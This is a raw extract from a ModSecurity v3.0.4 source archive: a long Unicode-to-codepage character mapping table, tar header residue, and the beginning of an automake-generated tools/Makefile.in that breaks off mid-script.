2665:03 2666:04 266a:0d 266b:0e 2758:7c 3000:20 3007:09 3008:3c 3009:3e 301a:5b 301b:5d ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 500 (IBM EBCDIC - International) 0004:37 0005:2d 0006:2e 0007:2f 0008:16 0009:05 000a:25 0014:3c 0015:3d 0016:32 0017:26 001a:3f 001b:27 0020:40 0021:4f 0022:7f 0023:7b 0024:5b 0025:6c 0026:50 0027:7d 0028:4d 0029:5d 002a:5c 002b:4e 002c:6b 002d:60 002e:4b 002f:61 003a:7a 003b:5e 003c:4c 003d:7e 003e:6e 003f:6f 0040:7c 005b:4a 005d:5a 005e:5f 005f:6d 0060:79 007f:07 0080:20 0081:21 0082:22 0083:23 0084:24 0085:15 0086:06 0087:17 0088:28 0089:29 008a:2a 008b:2b 008c:2c 008d:09 008e:0a 008f:1b 0090:30 0091:31 0092:1a 0093:33 0094:34 0095:35 0096:36 0097:08 0098:38 0099:39 009a:3a 009b:3b 009c:04 009d:14 009e:3e 00a0:41 00a6:6a 00c0:64 00c1:65 00c2:62 00c3:66 00c4:63 00c5:67 00c7:68 00c8:74 00c9:71 00ca:72 00cb:73 00cc:78 00cd:75 00ce:76 00cf:77 00d1:69 00df:59 00e0:44 00e1:45 00e2:42 00e3:46 00e4:43 00e5:47 00e7:48 00e8:54 00e9:51 00ea:52 00eb:53 00ec:58 00ed:55 00ee:56 00ef:57 00f1:49 00f8:70 ff01:4f ff02:7f ff03:7b ff04:5b ff05:6c ff06:50 ff07:7d ff08:4d ff09:5d ff0a:5c ff0b:4e ff0c:6b ff0d:60 ff0e:4b ff0f:61 ff1a:7a ff1b:5e ff1c:4c ff1d:7e ff1e:6e ff20:7c ff3b:4a ff3d:5a ff3e:5f ff3f:6d ff40:79 850 (OEM - Multilingual Latin I) 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01a9:53 01ab:74 01ae:54 01af:55 01b0:75 01b6:5a 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:27 02cd:5f 02dc:7e 0300:27 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 037e:3b 0393:47 03a3:53 03a6:46 03a9:4f 03b1:61 03b4:64 03b5:65 03c0:70 03c3:73 03c4:74 03c6:66 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27 201a:27 201c:22 201d:22 201e:22 2022:07 2024:07 2026:2e 2030:25 2039:3c 203a:3e 203c:13 2044:2f 2070:30 2074:34 2075:35 2076:36 2077:37 2078:39 207f:6e 2080:30 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 20a7:50 20dd:4f 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:50 2119:50 211a:51 211b:52 211c:52 211d:52 2122:54 2124:5a 2126:4f 2128:5a 212a:4b 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 2211:53 2212:2d 2215:2f 2216:2f 2217:2a 2219:07 221a:56 221e:38 221f:1c 2229:6e 2236:3a 223c:7e 2248:7e 2261:3d 2264:3d 2265:3d 2302:7f 2303:5e 2320:28 2321:29 2329:3c 232a:3e 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 2665:03 2666:04 266a:0d 266b:0e 2713:56 3000:20 3007:4f 3008:3c 3009:3e 301a:5b 301b:5d ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 860 (OEM - Portuguese) 00a4:0f 00a5:59 00a7:15 00a8:22 00a9:63 00ad:5f 00ae:72 00af:16 00b3:33 00b4:2f 00b6:14 00b8:2c 00b9:31 00be:33 00c4:41 00c5:41 00c6:41 00cb:45 00ce:49 00cf:49 00d0:44 00d6:4f 00d7:58 00d8:4f 00db:55 00dd:59 00de:54 00e4:61 00e5:61 00e6:61 00eb:65 00ee:69 00ef:69 00f0:64 00f6:6f 00f8:6f 00fb:75 00fd:79 00fe:74 00ff:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:5c 0161:7c 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c0:7c 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 0278:66 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02c9:16 02ca:2f 02cb:60 02cd:5f 02dc:7e 0300:60 0301:2f 0302:5e 0303:7e 0304:16 0305:16 0308:22 030e:22 0327:2c 0331:5f 0332:5f 037e:3b 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:5f 2011:5f 2013:5f 2014:5f 2017:5f 2018:27 2019:27 201a:2c 201c:22 201d:22 201e:22 2022:07 2024:07 2026:2e 2030:25 2032:27 2035:60 2039:3c 203a:3e 203c:13 2044:2f 2070:30 2074:34 2075:35 2076:36 2077:37 2078:38 2080:30 2081:31 2083:33 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 20dd:4f 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:70 2119:50 211a:51 211b:52 211c:52 211d:52 2122:74 2124:5a 2128:5a 212a:4b 212b:41 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 2205:4f 2212:5f 2215:2f 2216:5c 2217:2a 221f:1c 2223:7c 2236:3a 223c:7e 22c5:07 2302:7f 2303:5e 2329:3c 232a:3e 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 2665:03 2666:04 266a:0d 266b:0e 3000:20 3007:4f 3008:3c 3009:3e 301a:5b 301b:5d 30fb:07 861 (OEM - Icelandic) 00a2:63 00a4:0f 00a5:59 00a7:15 00a8:22 00a9:63 00aa:61 00ad:5f 00ae:72 00af:16 00b3:33 00b4:2f 00b6:14 00b8:2c 00b9:31 00ba:6f 00be:33 00c0:41 00c2:41 00c3:41 00c8:45 00ca:45 00cb:45 00cc:49 00ce:49 00cf:49 00d1:4e 00d2:4f 00d4:4f 00d5:4f 00d7:58 00d9:55 00db:55 00e3:61 00ec:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f5:6f 00f9:75 00ff:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 0278:66 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02c9:16 02ca:2f 02cb:60 02cd:5f 02dc:7e 0300:60 0301:2f 0302:5e 0303:7e 0304:16 0305:16 0308:22 030e:22 0327:2c 0331:5f 0332:5f 037e:3b 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2017:5f 2018:27 2019:27 201a:27 201c:22 201d:22 201e:22 2022:07 2024:07 2026:07 2030:25 2032:27 2035:27 2039:3c 203a:3e 203c:13 2044:2f 2070:30 2074:34 2075:35 2076:36 2077:37 2078:38 2080:30 2081:31 2083:33 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 20dd:4f 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:70 2119:50 211a:51 211b:52 211c:52 211d:52 2122:74 2124:5a 2128:5a 212a:4b 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 2205:4f 2212:5f 2215:2f 2216:5c 2217:2a 221f:1c 2223:7c 2236:3a 223c:7e 22c5:07 2302:7f 2303:5e 2329:3c 232a:3e 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 2665:03 2666:04 266a:0d 266b:0e 3000:20 3007:4f 3008:3c 3009:3e 301a:5b 301b:5d 30fb:07 863 (OEM - Canadian French) 00a1:21 00a5:59 00a9:63 00aa:61 00ad:16 00ae:72 00b9:33 00ba:6f 00c1:41 00c3:41 00c4:41 00c5:41 00c6:41 00cc:49 00cd:49 00d0:44 00d1:4e 00d2:4f 00d3:4f 00d5:4f 00d6:4f 00d7:58 00d8:4f 00da:55 00dd:59 00de:54 00e1:61 00e3:61 00e4:61 00e5:61 00e6:61 00ec:69 00ed:69 00f0:64 00f1:6e 00f2:6f 00f5:6f 00f6:6f 00f8:6f 00fd:79 00fe:74 00ff:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:22 02ba:27 02bc:27 02c4:5e 02c6:5e 02c8:27 02c9:16 02cb:60 02cd:5f 02dc:7e 0300:60 0302:5e 0303:7e 0304:16 0305:16 0331:5f 0332:5f 037e:3b 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27 201a:27 201c:22 201d:22 201e:22 2022:07 2024:07 2026:07 2030:25 2032:27 2035:27 2039:3c 203a:3e 203c:13 2044:2f 2070:30 2074:34 2075:35 2076:36 2077:37 2078:38 2080:30 2081:31 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 20a7:50 20dd:4f 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:70 2119:50 211a:51 211b:52 211c:52 211d:52 2122:74 2124:5a 2128:5a 212a:4b 212b:41 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 2205:4f 2212:5f 2215:2f 2216:5c 2217:2a 221f:1c 2223:7c 2236:3a 223c:7e 22c5:07 2302:7f 2303:5e 2329:3c 232a:3e 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 2665:03 2666:04 266a:0d 266b:0e 3000:20 3007:4f 3008:3c 3009:3e 301a:5b 301b:5d 30fb:07 865 (OEM - Nordic) 00a2:63 00a5:59 00a7:15 00a8:22 00a9:63 00ad:5f 00ae:72 00af:16 00b3:33 00b4:2f 00b6:14 00b8:2c 00b9:31 00bb:3e 00be:33 00c0:41 00c1:41 00c2:41 00c3:41 00c8:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d0:44 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d7:58 00d9:55 00da:55 00db:55 00dd:59 00de:54 00e3:61 00f0:64 00f5:6f 00fd:79 00fe:74 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02c9:16 02ca:2f 02cb:60 02cd:5f 02dc:7e 0300:60 0301:2f 0302:5e 0303:7e 0304:16 0305:16 0308:22 030e:22 0327:2c 0331:5f 0332:5f 037e:3b 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2017:5f 2018:27 2019:27 201a:27 201c:22 201d:22 201e:22 2022:07 2024:07 2026:07 2030:25 2032:27 2035:27 2039:3c 203a:3e 203c:13 2044:2f 2070:30 2074:34 2075:35 2076:36 2077:37 2078:38 2080:30 2081:31 2083:33 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 20dd:4f 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:70 2119:50 211a:51 211b:52 211c:52 211d:52 2122:74 2124:5a 2128:5a 212a:4b 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 2205:4f 2212:5f 2215:2f 2216:5c 2217:2a 221f:1c 2223:7c 2236:3a 223c:7e 226b:3c 22c5:07 2302:7f 2303:5e 2329:3c 232a:3e 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 2665:03 2666:04 266a:0d 266b:0e 3000:20 3007:4f 3008:3c 3009:3e 300b:3e 301a:5b 301b:5d 30fb:07 874 (ANSI/OEM - Thai) 00a7:15 00b6:14 203c:13 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 221f:1c 2302:7f 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 2665:03 2666:04 266a:0d 266b:0e ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 932 (ANSI/OEM - Japanese Shift-JIS) 00a1:21 00a5:5c 00a6:7c 00a9:63 00aa:61 00ad:2d 00ae:52 00b2:32 00b3:33 00b9:31 00ba:6f 00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c6:41 00c7:43 00c8:45 00c9:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d0:44 00d1:4e 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00de:54 00df:73 00e0:61 00e1:61 00e2:61 00e3:61 00e4:61 00e5:61 00e6:61 00e7:63 00e8:65 00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f0:64 00f1:6e 00f2:6f 00f3:6f 00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00fe:74 00ff:79 936 (ANSI/OEM - Simplified Chinese GBK) 00a6:7c 00aa:61 00ad:2d 00b2:32 00b3:33 00b9:31 00ba:6f 00d0:44 00dd:59 00de:54 00e2:61 00f0:65 00fd:79 00fe:74 949 (ANSI/OEM - Korean) 00a6:7c 00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c7:43 00c8:45 00c9:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d1:4e 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d6:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00e0:61 00e1:61 00e2:61 00e3:61 00e4:61 00e5:61 00e7:63 00e8:65 00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f3:6f 00f4:6f 00f5:6f 00f6:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00ff:79 20a9:5c 950 (ANSI/OEM - Traditional Chinese Big5) 00a1:21 00a6:7c 00a9:63 00aa:61 00ad:2d 00ae:52 00b2:32 00b3:33 00b9:31 00ba:6f 00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c6:41 00c7:43 00c8:45 00c9:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d0:44 00d1:4e 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00de:54 00df:73 00e0:61 00e1:61 00e2:61 00e3:61 00e4:61 00e5:61 00e6:61 00e7:63 00e8:65 00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f0:65 00f1:6e 00f2:6f 00f3:6f 00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00fe:74 00ff:79 (UTF-7) (UTF-8) modsecurity-v3.0.4/tools/0000755000175000017500000000000013607066346015660 5ustar zimmerlezimmerlemodsecurity-v3.0.4/tools/Makefile.in0000644000175000017500000005405413607066346017735 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ 